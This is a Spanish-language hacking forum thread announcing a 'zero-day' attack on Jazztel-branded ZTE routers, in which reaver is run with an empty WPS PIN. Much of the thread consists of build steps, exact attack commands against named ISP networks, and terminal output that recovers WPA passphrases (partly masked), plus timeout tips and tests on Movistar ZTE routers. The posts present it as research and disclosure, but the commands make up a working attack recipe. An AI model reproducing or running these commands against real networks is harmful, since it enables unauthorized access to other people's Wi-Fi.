El libre pensamiento para un internet libre

No estas registrado.  

Anuncio

Wifi-libre.com: El libre pensamiento para un internet libre / Regístrese ahora

#1 27-06-2017 05:19:56

kcdtv
Administrator

Registrado: 14-11-2014
Mensajes: 4,252

0 Day crack ZTE Jazztell explotando nueva vulnerabilidad PIN

Vídeo Prueba de Concepto

  Es muy tarde para dar los detalles....
...Pero tenía que comunicarles en exclusiva la muy buena noticia.
  Romper los jazztell_XXXX por WPS es ahora posible cool
  Nos vemos mañana (quiero decir más tarde que ya cantan los parajos  wink ) [email protected] [email protected]
¡Que tengan un buen día 0! smile

Desconectado

Anuncio

Wifi-libre.com: El libre pensamiento para un internet libre / Regístrese ahora

#2 27-06-2017 08:02:03

Nolose
Usuario

Registrado: 08-02-2016
Mensajes: 29

Re: 0 Day crack ZTE Jazztell explotando nueva vulnerabilidad PIN

Que mejor noticia que leer esto una vez he acabado los exámenes de universidad!!!


Sois unos máquinas Kcdtv, a la espera de más info, y vamos a seguir investigando!!

Desconectado

#3 27-06-2017 17:17:12

dynyly
Usuario

Registrado: 19-04-2015
Mensajes: 311

Re: 0 Day crack ZTE Jazztell explotando nueva vulnerabilidad PIN

salu2
esperando mas claridad solo veo que usa el reaver de tx6  y no veo nada del comando de reaver y el tema pin si es por defecto o le mete un pin en concreto o hace un brute ...
No veo nada : ojala aclares un poco todo
--edit---
no no mete pin lol que hace aclara esto por favor
(libre ;libre quiero ser :quiero ser;quiero ser libre)

Ultima edición por dynyly (27-06-2017 17:23:07)

Desconectado

#4 27-06-2017 21:48:03

kcdtv
Administrator

Registrado: 14-11-2014
Mensajes: 4,252

Re: 0 Day crack ZTE Jazztell explotando nueva vulnerabilidad PIN

Buenas noches de día zero.
estamos preparando un tarball y acabo de redactar una nota explicativa: Introducing a new way to crack WPS: " option p with arbitrary string"
Sí dinily, has acertado,;) Se trata de mandar un PIN "en blanco", lo que puedes hacer con reaver 1.6b, que va a ser pronto 1.6.1 y en futuras versiones.
Siempre pillando la ultima revisión del repositorio oficial (el "de siempre" creado por t6x, este mismo, ) 
Mandar un PIN vacío se hace con -p "" o -p ''
Al igual que si defines una variable con valor nulo en bash.
hasta luego, work in progress

Desconectado

#5 28-06-2017 00:19:29

dynyly
Usuario

Registrado: 19-04-2015
Mensajes: 311

Re: 0 Day crack ZTE Jazztell explotando nueva vulnerabilidad PIN

salu2
nada a mi se me para no se ....hago todo bien instalo y demas

wifislax64 ~ #  git clone https://github.com/t6x/reaver-wps-fork-t6x

wifislax64 ~ # cd reaver-wps-fork-t6x*/
wifislax64 reaver-wps-fork-t6x # cd src/
wifislax64 src # ./configure
wifislax64 src # make
wifislax64 src # sudo make install

pero cuando lanzo ataque se para despues de un intento

wifislax64 src # ./reaver -i mon0 -b 2C:95:7F:xxxxxxx -c 1 -p "" -vv

Reaver v1.6b WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <[email protected]>

[+] Switching mon0 to channel 1
[+] Waiting for beacon from 2C:95:7F:xxxxxx
[+] Associated with 2C:95:7F::xxxxxx (ESSID: JAZZTEL_7mmmm)
[+] Trying pin ""
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[!] WARNING: Receive timeout occurred
[+] Sending WSC NACK
[+] Quitting after 1 crack attempts
[-] Failed to recover WPA key
[*] String pin was specified, nothing to save.
wifislax64 src # 

-----
otra cosa puede ser porque no entiendo iwconfig

wifislax64 src # iwconfig wlan1 mode monitor
wifislax64 src # iwconfig wlan1 up && airmon-ng 
iwconfig: unknown command "up"
wifislax64 src # iwconfig up wlan1 && airmon-ng
iwconfig: unknown command "wlan1"

pongo iwconfig -h  y no me sale nada de levantar interfaces en opciones generales me manda que busque info en su casa

wifislax64 ~ # iwconfig -h
Usage: iwconfig [interface]
                interface essid {NNN|any|on|off}
                interface mode {managed|ad-hoc|master|...}
                interface freq N.NNN[k|M|G]
                interface channel N
                interface bit {N[k|M|G]|auto|fixed}
                interface rate {N[k|M|G]|auto|fixed}
                interface enc {NNNN-NNNN|off}
                interface key {NNNN-NNNN|off}
                interface power {period N|timeout N|saving N|off}
                interface nickname NNN
                interface nwid {NN|on|off}
                interface ap {N|off|auto}
                interface txpower {NmW|NdBm|off|auto}
                interface sens N
                interface retry {limit N|lifetime N}
                interface rts {N|auto|fixed|off}
                interface frag {N|auto|fixed|off}
                interface modulation {11g|11a|CCK|OFDMg|...}
                interface commit
       Check man page

-----------
tambien en el enlace que diste ahora esta cambiado antes habia otras cosas explicando como meter un paht o algo asi esta eliminado vaya rapided estais dandole fuerte con las revisiones     
se que estas liado sobre todo ahora : que estas con esto del reaver pero cuando puedas ....

Ultima edición por dynyly (28-06-2017 00:21:40)

Desconectado

#6 28-06-2017 02:40:29

kcdtv
Administrator

Registrado: 14-11-2014
Mensajes: 4,252

Re: 0 Day crack ZTE Jazztell explotando nueva vulnerabilidad PIN

Uso iwconfig para el modo monitor porque uso la AWUS1900
No importa como habilitas el modo monitor smile
Es más: Mejor uses airmon-ng si puedes así estas seguro de tener conflictos con un proceso.
1) Pasa el modo monitor como siempre
2) Haces tu ataque reaver como siempre a la diferenicas de que debes usar -p "" o -p ``
Lo haces bien.
Has verificado que es un ZTE ZHXN H218N y no otro modelo.ZTE... (que no sea un ZXHN 108N o el nuevo de doble banda)
mañana traduciré el texto que he publicado en inglès para presentar el full dislosure aquí con todos los detalles.

Desconectado

#7 28-06-2017 17:20:30

dynyly
Usuario

Registrado: 19-04-2015
Mensajes: 311

Re: 0 Day crack ZTE Jazztell explotando nueva vulnerabilidad PIN

salu2

fabricante: ZTE CORPARATION
Modelo    : ZXHN H108N
Device name: ZXHN H108N   V2.3

wifislax64 src # ./reaver -i mon0 -b 2C:95:7F:xxxxxxx -c 1 -p "" -vv

Reaver v1.6b WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <[email protected]>

[+] Switching mon0 to channel 1
[+] Waiting for beacon from 2C:95:7F::xxxxxx
[+] Associated with 2C:95:7F:xxxxxx (ESSID: JAZZTEL_Nlll)
[+] Trying pin ""
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[!] WARNING: Receive timeout occurred
[+] Sending WSC NACK
[+] Quitting after 1 crack attempts
[-] Failed to recover WPA key
[*] String pin was specified, nothing to save.
wifislax64 src # 

es que le entra hasta atras hasta los cojones con un solo intento con la opcion -T pa los m5 y demas bravo makinas la version Modelo    : ZXHN H108N tambien cae

reaver -i mon0 -b 2C:95:7F:xxxxxx  -c 1 -T 5 -p "" -vv

Reaver v1.6b WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <[email protected]>

[+] Switching mon0 to channel 1
[+] Waiting for beacon from 2C:95:7F:xxxxxx
[+] Associated with 2C:95:7F:xxxxxxx (ESSID: JAZZTEL_Nlll)
[+] Trying pin ""
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received M5 message
[+] Sending M6 message
[+] Received M7 message
[+] Sending WSC NACK
[+] Sending WSC NACK
[+] Pin cracked in 6 seconds
[+] WPS PIN: ''
[+] WPA PSK: '35r2XXXXXXX'
[+] AP SSID: 'JAZZTEL_Nlll'
[*] String pin was specified, nothing to save.

Ultima edición por dynyly (28-06-2017 17:53:48)

Desconectado

#8 28-06-2017 17:54:43

kcdtv
Administrator

Registrado: 14-11-2014
Mensajes: 4,252

Re: 0 Day crack ZTE Jazztell explotando nueva vulnerabilidad PIN

La opción -p con cadena arbitraria se parra si recibes un NACK después tu M4
Así tiene que ser: Si no parramos después un intento y que empezamos a guardar el progreso con un pin nulo o un PIN que no es un PIN, vas a destruir el fichero sesión que tiene sitio solo para PINes legítimos.
No se puede hacer de otra forma.
A veces necesitas repetir dos o tres veces el ataque con un PIN nulo antes de conseguir la llave porque recibes un NACK en lugar de un M5 lo que significa teóricamente que la "primera mitad es mala"
A veces recibes el M5 y sigue atacando porque la "primera mitad es buena" (como en el vídeo)
  No olvides que el método sale por completo de las normas y no podemos tratar lo como un PIN normal.
Es una opción para experimentar contra routers que tienen una configuración "anormal".

¡Olé! : No había visto tu repsuesta....
Te molestaría mandarme los datos por privado y hacer una captrua de pantalla de este ataque (editada)
Exelente noticía, bien hecho smile

Desconectado

#9 28-06-2017 17:56:56

dynyly
Usuario

Registrado: 19-04-2015
Mensajes: 311

Re: 0 Day crack ZTE Jazztell explotando nueva vulnerabilidad PIN

has vuelto a ver el mensaje es que lo he editado la opcion -T  entran los m5

Desconectado

#10 28-06-2017 17:59:16

kcdtv
Administrator

Registrado: 14-11-2014
Mensajes: 4,252

Re: 0 Day crack ZTE Jazztell explotando nueva vulnerabilidad PIN

big_smile   ¡Olé!
Te molestaría hacer una captura de pantalla guapa editada? La pondremos en el tema final bien redactado smile

Esto se está poniendo.... vamos... jazztel como en los viejos tiempo...-

Muy buena idea esto de aumentar el tiempo para timeout, así lo dejas esperar más... ¡Sí señor! smile

Desconectado

#11 28-06-2017 18:23:49

dynyly
Usuario

Registrado: 19-04-2015
Mensajes: 311

Re: 0 Day crack ZTE Jazztell explotando nueva vulnerabilidad PIN

salu2
a veces hay que hacer un reinicio de interfaces varias veces  hasta  que lo pilla y entra hasta atras con un solo intento
https://s8.postimg.org/6y7k1auw5/instant_nea3.png

en otro momento dejare foto de captura para  verificacion de modelo pero ya te lo digo el 108

Ultima edición por dynyly (28-06-2017 18:25:28)

Desconectado

#12 28-06-2017 18:48:31

kcdtv
Administrator

Registrado: 14-11-2014
Mensajes: 4,252

Re: 0 Day crack ZTE Jazztell explotando nueva vulnerabilidad PIN

Si no es uno es el otro....  Gracias wink

Desconectado

#13 28-06-2017 19:30:08

kcdtv
Administrator

Registrado: 14-11-2014
Mensajes: 4,252

Re: 0 Day crack ZTE Jazztell explotando nueva vulnerabilidad PIN

¡Es qué!.... lol
Voy a 100 por horas como un pollo sin cabeza  lol
No solamente tenemos al ZH108N y al ZH218N sino también al ZH298N lol
Lo que pasa es que es lioso, algunos salen como H218N y otros como H298N en la interfaz de configuración y llevan en sus PROBES ambos modelos...
Este por ejemplo es un H298N

0day_wpsmas_1.jpg

Pero miren los PROBES

0day_wpsmas_2.jpg

¡Salen ambos modelos! tongue
Un lio...
...Así que es más fácil enfocar la situación así:
  Todos los routers ZTE jazztell son vulnerable a este nuevo método menos el modelo ZXHN F680.
Una masacre, no hay otras palabras. tongue

Desconectado

#14 28-06-2017 21:11:06

dynyly
Usuario

Registrado: 19-04-2015
Mensajes: 311

Re: 0 Day crack ZTE Jazztell explotando nueva vulnerabilidad PIN

salu2
si te vale esta captura para verificar
Sin_nombre1.png

bravo makinas  fabuloso avance

Desconectado

#15 28-06-2017 21:15:56

USUARIONUEVO
Usuario

Registrado: 07-07-2015
Mensajes: 290

Re: 0 Day crack ZTE Jazztell explotando nueva vulnerabilidad PIN

parece que la cosa marcha big_smile

en estos casos es donde se agradeceria que wash , pudiera filtrar en el escaneo , por rango de mac o fabricante.

se que aun estais on arreglos y teneis cosas pendientes. smile

¿solo estias probando contra routers ZTE ?

tenia por casa un router de esos que el pin no era estandard , seria la bomba que fuesen vulnerables, esto es como cuando salio el algoritmo zao  , parecia que solo unos pocos y al final eran muchos los routers afectados.

Ultima edición por USUARIONUEVO (28-06-2017 21:17:15)

Desconectado

#16 28-06-2017 21:35:47

Patcher
Very Important Usuario

Registrado: 14-01-2016
Mensajes: 504

Re: 0 Day crack ZTE Jazztell explotando nueva vulnerabilidad PIN

Primero de nada enhorabuena por el curro que os estais pegando con Reaver y con este descubrimiento. Bravo Cracks !!!.

¿Recuerdas que esto y lo habiamos hablando hace unos meses? Extraño ataque pixeidust contra ZTE H218N sin WPS habilitado

Por mi lado confirmo lo visto por dynyly con los ZTE H108N
1rCTZzk.png

No he tenido que hacer nada nuevo, funciona con la versión actual de Waircut V1.3... sin más que añadir un pin "Vacio", del tirón y a la primera.

Fijate que en el post del hilo que he mencionado tambien hablo de otro modelo de Movistar el cual tambien tiene este comportamiento erratico con los Mx, aunque en este caso tiene menos interés por que es vulnerable a un ataque pixie dust, igualmente tengo que probarlo.

Porcierto, fijaos tambien en que el router anuncia que está configurado sólo en modo pushbutton... !!Que mentiroso!! o que gran chapuza.

Ultima edición por Patcher (28-06-2017 21:52:27)

Desconectado

#17 28-06-2017 22:11:29

dynyly
Usuario

Registrado: 19-04-2015
Mensajes: 311

Re: 0 Day crack ZTE Jazztell explotando nueva vulnerabilidad PIN

salu2
alguien puede confirmar lo  de -T en los zxhn108n pues a mi si no pongo dicha opcion nada  pongo code de pantalla
1 intento logrado con opcion -T 
2;3:y 4intento fallido sin opcion -T
5 intento logrado con opcion -T   todo en una sesion

wifislax64 src # reaver -i mon0 -b 2C:95:7F:xxxxxx -c 1 -T 5 -p "" -vv

Reaver v1.6b WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <[email protected]>

[+] Switching mon0 to channel 1
[+] Waiting for beacon from 2C:95:7F:xxxxxx
[+] Associated with 2C:95:7F:xxxxxx (ESSID: JAZZTEL_xxxx)
[+] Trying pin ""
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received M5 message
[+] Sending M6 message
[+] Received M7 message
[+] Sending WSC NACK
[+] Sending WSC NACK
[+] Pin cracked in 11 seconds
[+] WPS PIN: ''
[+] WPA PSK: '3xxxxxxxxxxx'
[+] AP SSID: 'JAZZTEL_xxxx'
[*] String pin was specified, nothing to save.


wifislax64 src # reaver -i mon0 -b 2C:95:7F:xxxxxx -c 1 -p "" -vv

Reaver v1.6b WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <[email protected]>

[+] Switching mon0 to channel 1
[+] Waiting for beacon from 2C:95:7F:xxxxx
[+] Associated with 2C:95:7F:xxxxxx (ESSID: JAZZTEL_xxxx)
[+] Trying pin ""
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[!] WARNING: Receive timeout occurred
[+] Sending WSC NACK
[+] Quitting after 1 crack attempts
[-] Failed to recover WPA key
[*] String pin was specified, nothing to save.


wifislax64 src # reaver -i mon0 -b 2C:95:7F:xxxxxx -c 1 -p "" -vv

Reaver v1.6b WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <[email protected]>

[+] Switching mon0 to channel 1
[+] Waiting for beacon from 2C:95:7F:xxxxxx
[+] Associated with 2C:95:7F:xxxxx (ESSID: JAZZTEL_xxxx)
[+] Trying pin ""
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[!] WARNING: Receive timeout occurred
[+] Sending WSC NACK
[+] Quitting after 1 crack attempts
[-] Failed to recover WPA key
[*] String pin was specified, nothing to save.


wifislax64 src # reaver -i mon0 -b 2C:95:7F:xxxxxx -c 1 -p "" -vv

Reaver v1.6b WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <[email protected]>

[+] Switching mon0 to channel 1
[+] Waiting for beacon from 2C:95:7F:xxxxx
[+] Associated with 2C:95:7F:xxxxxx (ESSID: JAZZTEL_xxxx)
[+] Trying pin ""
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[!] WARNING: Receive timeout occurred
[+] Sending WSC NACK
[+] Quitting after 1 crack attempts
[-] Failed to recover WPA key
[*] String pin was specified, nothing to save.


wifislax64 src # reaver -i mon0 -b 2C:95:7F::xxxxxx -c 1 -T 5 -p "" -vv

Reaver v1.6b WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <[email protected]>

[+] Switching mon0 to channel 1
[+] Waiting for beacon from 2C:95:7F:xxxxxx
[+] Associated with 2C:95:7F:xxxxxx (ESSID: JAZZTEL_xxxx)
[+] Trying pin ""
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received M5 message
[+] Sending M6 message
[+] Received M7 message
[+] Sending WSC NACK
[+] Sending WSC NACK
[+] Pin cracked in 11 seconds
[+] WPS PIN: ''
[+] WPA PSK: '3xxxxxxxxxxx'
[+] AP SSID: 'JAZZTEL_xxxx'
[*] String pin was specified, nothing to save.
wifislax64 src # 

demo   que a mi si no pongo opcion -T  no me manda m5 y demas
estais dejando reaver mas afilado que nunca bravo ;bravo

Desconectado

#18 28-06-2017 22:13:01

kcdtv
Administrator

Registrado: 14-11-2014
Mensajes: 4,252

Re: 0 Day crack ZTE Jazztell explotando nueva vulnerabilidad PIN

¡Yeeeeees! ¡Patcher! Solo faltaba tú para que la fiesta sea total. smile
¡Qué gusto ver lo en waircut!.... smile

Patcher escribió:

¿Recuerdas que esto y lo habiamos hablando hace unos meses? Extraño ataque pixeidust contra ZTE H218N sin WPS habilitado

¡Cómo no!:D

Patcher escribió:

Porcierto, fijaos tambien en que el router anuncia que está configurado sólo en modo pushbutton... !!Que mentiroso!! o que gran chapuza.

Más bien lo segundo me parece... lol
@ Dynyly, no es necesario al no ser que las condiciones de emisión y recepción lo requieren

Desconectado

#19 28-06-2017 23:33:49

dynyly
Usuario

Registrado: 19-04-2015
Mensajes: 311

Re: 0 Day crack ZTE Jazztell explotando nueva vulnerabilidad PIN

salu2
como soy un loco pues ...
mira ahora lo que sale en los de timofonica ZTE big_smile:D:D  te de hasta m6  pero no da clave son vulnerables a pixie pero mira que curioso al poco se bloquea sending eopol con todos pero algunos mandan hasta m6 pero nada

reaver -i mon0 -b F8:BF:53:xxxxx -c 13 -T 5 -p "" -vv

Reaver v1.6b WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <[email protected]>

[+] Switching mon0 to channel 13
[+] Waiting for beacon from F8:BF:53:xxxxx
[+] Associated with F8:BF:53:xxxxx (ESSID: MOVISTAR_xxxx)
[+] Trying pin ""
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received M5 message
[+] Sending M6 message
[+] Received M5 message
[+] Sending WSC NACK
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x03), re-trying last pin
[+] Trying pin ""
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received M5 message
[+] Sending M6 message
[+] Received M5 message
[+] Sending WSC NACK
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x03), re-trying last pin
 
wifislax64 ~ # reaver -i mon0 -b F8:7F:39:xxxx -c 11 -T 5 -p "" -vv

Reaver v1.6b WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <[email protected]>

[+] Switching mon0 to channel 11
[+] Waiting for beacon from F8:7F:39:xxxxx
[+] Associated with F8:7F:39:xxxx (ESSID: MOVISTAR_xxxx)
[+] Trying pin ""
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received M5 message
[+] Sending M6 message
[+] Received M5 message
[+] Sending WSC NACK
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x03), re-trying last pin
[+] Trying pin ""
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received M5 message
[+] Sending M6 message
[+] Received M5 message
[+] Sending WSC NACK
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x03), re-trying last pin
[+] Trying pin ""
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request

en cuanto le entra Sending EAPOL START request ya nada hay que hacer pero de principio manda m6 como antes con los zhhx

Ultima edición por dynyly (28-06-2017 23:37:59)

Desconectado

#20 29-06-2017 00:22:21

kcdtv
Administrator

Registrado: 14-11-2014
Mensajes: 4,252

Re: 0 Day crack ZTE Jazztell explotando nueva vulnerabilidad PIN

No sabía que había ZTE telefónica.... big_smile
Pues sí dynyly: Están racionando más de lo normal.
Normalmente cuando tienen el WPS configurado con un PIN te mandan directo un NACK en lugar de un M5 ya que la primera mitad no era acertada... tratan el PIN en blanco como si fuera un PIN no correcto y te rechazan por no haber acertado la primera mitad... Lo normal.
Es muy curioso efectivamente que te mande así un M6 M5.

Desconectado

#21 29-06-2017 22:35:02

dynyly
Usuario

Registrado: 19-04-2015
Mensajes: 311

Re: 0 Day crack ZTE Jazztell explotando nueva vulnerabilidad PIN

salu2
pues va ser que tienes razon algo esconden o de algo se protege porque la mayoria de movistar  que probado pasa lo mismo da m6 m5 y se bloquean  sending eopol
y ya no hay manera  como cuando le salta un bloqueo
son vulnerables a pixie pero que cosa mas curiosa ¿¿que le pasa a movistar con sus zte y algunos otros routers de movistar....??
fantastico repaso a reaver 100%  mas afilado que nunca

Desconectado

#22 30-06-2017 13:08:45

kcdtv
Administrator

Registrado: 14-11-2014
Mensajes: 4,252

Re: 0 Day crack ZTE Jazztell explotando nueva vulnerabilidad PIN

¿¿que le pasa a movistar con sus zte y algunos otros routers de movistar....??

Los Mitarstar HGW-2501GN-R2 tienen el WPS "roto" tras un upgrade de firmware. (3 meses atrás o algo así)
Nunca mandan un M3.
  No parecen ser vulnerables al ataque con un PIN nulo ya que no he conseguido un M3 (y por supuesto tampoco he conseguido un M5)

Desconectado

#23 04-07-2017 20:40:13

dolpsdw
Usuario

Registrado: 04-07-2017
Mensajes: 1

Re: 0 Day crack ZTE Jazztell explotando nueva vulnerabilidad PIN

3 intentos fallidos, sin el T5

Fue especificar el -c X y -T 5 y funciono.

Desconectado

#24 05-07-2017 16:24:28

Betis-Jesus
Very Important Usuario

Registrado: 29-03-2015
Mensajes: 528
Página Web

Re: 0 Day crack ZTE Jazztell explotando nueva vulnerabilidad PIN

esto se pone interesante, es sorprendete que a enviar un pin nulo, tenga este fallo, los normal es que terminara bloquedo, ya que deberia de considerarlo como pin invalido, el propio algoritmo. no me explico este fallo tan tonto.


viver y ser libre

Desconectado

#25 05-07-2017 21:12:08

dynyly
Usuario

Registrado: 19-04-2015
Mensajes: 311

Re: 0 Day crack ZTE Jazztell explotando nueva vulnerabilidad PIN

salu2
lo interesante es que he probao con otro router movistar zte y manda m6 y se bloquea al poco con sending eopol (mismo router 3 mac diferentes de movistar )
lastima que no tenga mas zte para hacer pruebas big_smile pero apostaria fijo que con otros zte de movistar pasaria lo mismo mandar m6 y bloquearse
pues eso de mandar m6 y bloquearse solo lo he visto en routers zte ( es una leve opinion )

Desconectado

Anuncio

Wifi-highpower.es es distribuidor oficial de Alfa Network

Temas similares

Tema Respuestas Vistas Ultimo mensaje
3 139 Hoy 14:45:15 por crash
Hostbase 1.2 está aqui por Koala  [ 1 2 3 4 5 ]
103 5432 Hoy 14:28:04 por crash
67 1991 Hoy 13:35:16 por crash
27 2600 Ayer 21:05:17 por josep345
17 592 Ayer 16:36:48 por bala

Pie de página

Información del usuario

Ultimo usuario registrado: juanita
Usuarios registrados conectados: 0
Invitados conectados: 17

Estadisticas de los foros

Número total de usuarios registrados: 1,114
Número total de temas: 1,121
Número total de mensajes: 11,583

Máx. usuarios conectados: 69 el 15-10-2017 09:23:21